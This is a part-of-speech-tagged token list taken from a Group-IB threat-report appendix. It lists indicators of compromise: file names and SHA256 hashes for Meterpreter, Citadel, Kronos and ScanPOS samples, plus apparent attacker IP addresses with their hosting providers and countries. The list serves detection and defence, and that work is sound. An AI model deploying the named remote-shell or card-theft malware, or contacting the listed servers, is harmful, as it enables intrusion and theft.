txt.exe NN
was VBD
not RB
restored VBN
Module NNP
which WDT
operates VBZ
with IN
temp NN
files NNS
Meterpreter NN
File NN
name NN
test64.exe NN
test64.exe NN
SHA256 NN
187E4204036445E6A86DB015166F271C472F40CC7D0224B3995686856917D64C CD
642eae9a42c06265444577fc28165dab99efe3495eeae1be95b8608867f8276d CD
test32.exe NN
649fc133ddacc38fb7f2a730f261365e03b84de7f8ccd942573165ba5ff62728 CD
asys.exe NN
cmd.exe NN
6ce7c4cb9e51116a4565e9b2e129335a4d23cfc51a32080aa9f25689cb1c6ef2 CD
7eef88e4b0d5ad549d18629f4491088d5d328d7bcaab8ce68216a331b284d43f CD
launch-paranoid-stageless3 NN
. .

exe NN
f98b0220a11b57e3c812e7f86f5e5c3f8bbdb5d5ce9dc7b721e28a7f28ecb1ef NN
mencstager.exe NN
7eef88e4b0d5ad549d18629f4491088d5d328d7bcaab8ce68216a331b284d43f CD
msc.exe NN
msc3.exe NN
0b778857bbc4ec36020d021f475ff90550134beb9506c53071652421e10ddfff CD
0b778857bbc4ec36020d021f475ff90550134beb9506c53071652421e10ddfff CD
34 CD
msc4.exe NN
msc5.exe NN
msc6.exe NN
msc7.exe NN
53c789565821b6eb64bd7f002e38b8259bde3bbbb39798c82657b2b5d59bcd9f CD
98fb846df3687b3c9c7fa66f39d6c70948e8330489be7c787e1f2c3b23f8d205 CD
92afe22f494a849345b18d2b302e71a4336871a7956795a7188280e4c7bd8607 CD
73b8ed8f14ec2260ae332603f723a5eb0a52c4c997454904e3d5ff254a27a6e6 CD
puttyx.exe NN
e19e48ed659981c4d79c20f1ba9c2ab9af4fb94c67c71f64d0ea48be3ff9da97 NN
rc4.dll NN
rc4.exe NN
rc4.hta NN
8a0be0a97ba19d4498b58365d36ba5461039e41f73bbd745b15b80fc21e38c3f CD
a7035c20c32ad4cd1cc76b211f6258fc5858e4bc43031d04e3655b38b666c0c4 NN
72ee03b51544002df3e25d1a730e650389bdbd5f1cff91488ed9e05944b3cb52 CD
Meterpreter NNP
related VBD
scripts NNS
File NN
name NN
debug.vbs NN
drives.vbs NN
SHA256 NN
c8d4ba78c89bdb1af01100518db53bf88e0120c89ba7e346e7fcda4b56a07595 NN
f51d42946cc7f17114a3acc0d9678f2fa5ee4527a877b6b8071df22c26cfe6c1 NN
gatherNetworksInfo.vbs NN
a3da7fd3dd3c12f6b0f3ce7d96906e8fcdcc0817a546777a5b37b9b1d1ec954d NN
link.vbs NN
link2.vbs NN
link3.vbs NN
link4.vbs NN
link5.vbs NN
link6.vbs NN
link7.vbs NN
lmagent.vbs NN
logon.vbs NN
701e99c1a84dd8e84b252512ff13b777a3f2135f7cdf3873086e021b19289681 CD
fffd31faa176cee8c41dac2542308c3e9e553f3d7a9ce9a6422b390ffb23e511 NN
2267bbf93860dd1c62da2308a3bd2a265c418af1a3257c8649f6495de6a3d392 CD
5f254208721c87c274ab26ce4c21765efe56cfa65ee67bfb60c783097839f169 CD
0f6bff21f72b017de70556f5f7507b470e182e7f4f5ee9d6a72f7aff0c957218 CD
a467d30dd3138b300a15b733a92482a9f545d217c6c7c89e5ea975eb021002f5 NN
e360066239e8c19d50b625c8b935fe7f026ade845470250bf6b6aa2cb3943af0 NN
7180d79351741e8d53143e538aa46a7cc528fbae1baf9d1f95f362ef5b8d95e2 CD
f51d42946cc7f17114a3acc0d9678f2fa5ee4527a877b6b8071df22c26cfe6c1 NN
msdefender.bat NN
8cfeb71eaaa3df217e15a449bc4656841b58a4737760d956b1c8e6039cff61e6 CD
OLD_winstart.vbs NN
5f5ae87472013f6ec2c6d261e6675aa7b143dcaf3f5e372a51feb61a34097efe CD
proxystager.bat NN
3a163bb0a8abe244815836a05fab48b640ec537bd76c92b7857db18657d2a774 CD
ps.bat NN
9e9149ae6092c4a5bd4cb36cf40ec660e3ee10e76834340bf1234186315ca808 CD
RAVBg64.vbs NN
a3da7fd3dd3c12f6b0f3ce7d96906e8fcdcc0817a546777a5b37b9b1d1ec954d NN
se.vbs NN
ff999c968bce81987cab47a02a3b176042489d82644d4c6fb13d5c8c1244cbcc NN
35 CD
Citadel NN
File NN
name NN
SHA256 NN
Description NN
c4c.exe NN
c7d20b726708a441db3d864457a097833654719513990f823b1deb7c48b65472 NN
Citadel NN
fce2857010e1.exe NN
b75d28deeaece776fc09dbc0cd351adab1ed80ef4245f7681d4a57e47fa83fb7 NN
Citadel NN
cbcs.exe NN
e01e9cdfff085393362e1e2e3ec8cae33c536053760e65c7617d5a0dfd005874 NN
Citadel NNP
Backconnect NNP
Server NNP
Kronos NNS
File NN
name NN
SHA256 NN
203.exe CD
536fc552cc24733f05f5a3be333c030fc848060da978b282d67d67a7c76c0d30 CD
ScanPOS NN
File NN
name NN
SHA256 NN
a8b05325.exe NN
093c81f0b234c2aa0363129fdaaaf57551f161915da3d23f43a792b5f3024c1e CD
IP NNP
Addresses NNS
IP NNP
Addresses NNS
46.45.171.174 CD
46.45.171.174 CD
188.120.235.201 CD
82.146.54.5 CD
82.146.54.5 CD
83.220.172.71 CD
37.46.133.190 CD
172.86.121.11 CD
146.185.243.19 CD
188.120.235.201 CD
188.120.230.218 CD
188.120.230.235 CD
185.141.25.222 CD
185.141.25.81 CD
185.86.149.140 CD
212.117.180.238 CD
155.94.238.15 CD
Malware NN
ScanPOS NN
Kronos NNS
Citadel NN
Citadel NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
Meterpreter NN
ISP NN
Sayfa JJ
Net NN
Sayfa JJ
Net NN
ISPsystem NN
ISPsystem NN
ISPsystem NN
ISPsystem NN
ISPsystem NN
Router NNP
Hosting NNP
Just RB
Hosting VBG
ISPsystem NN
ISPsystem NN
ISPsystem NN
HostSailor NN
HostSailor NN
Country NN
Turkey NN
Turkey NN
Russia NN
Russia NN
Russia NN
Russia NN
Russia NN
USA NNP
Russia NN
Russia NN
Russia NN
Russia NN
Romania NN
Romania NN
Virtual JJ
Server NNP
hosting NN
Latvia NN
root NN
S.A NNP
. .
Luxembourg NN
HostBrew NNP
, ,
LLC NNP
USA NNP
36 CD
Preventing VBG
and CC
investigating VBG
cybercrime NN
since IN
2003 CD
www.group-ib.com NN
blog.group-ib.com NN
info JJ
@ CD
group-ib.com NN
+44 $
2036085907 CD
twitter.com/groupib_gib NN
linkedin.com/organization/1382013 NN

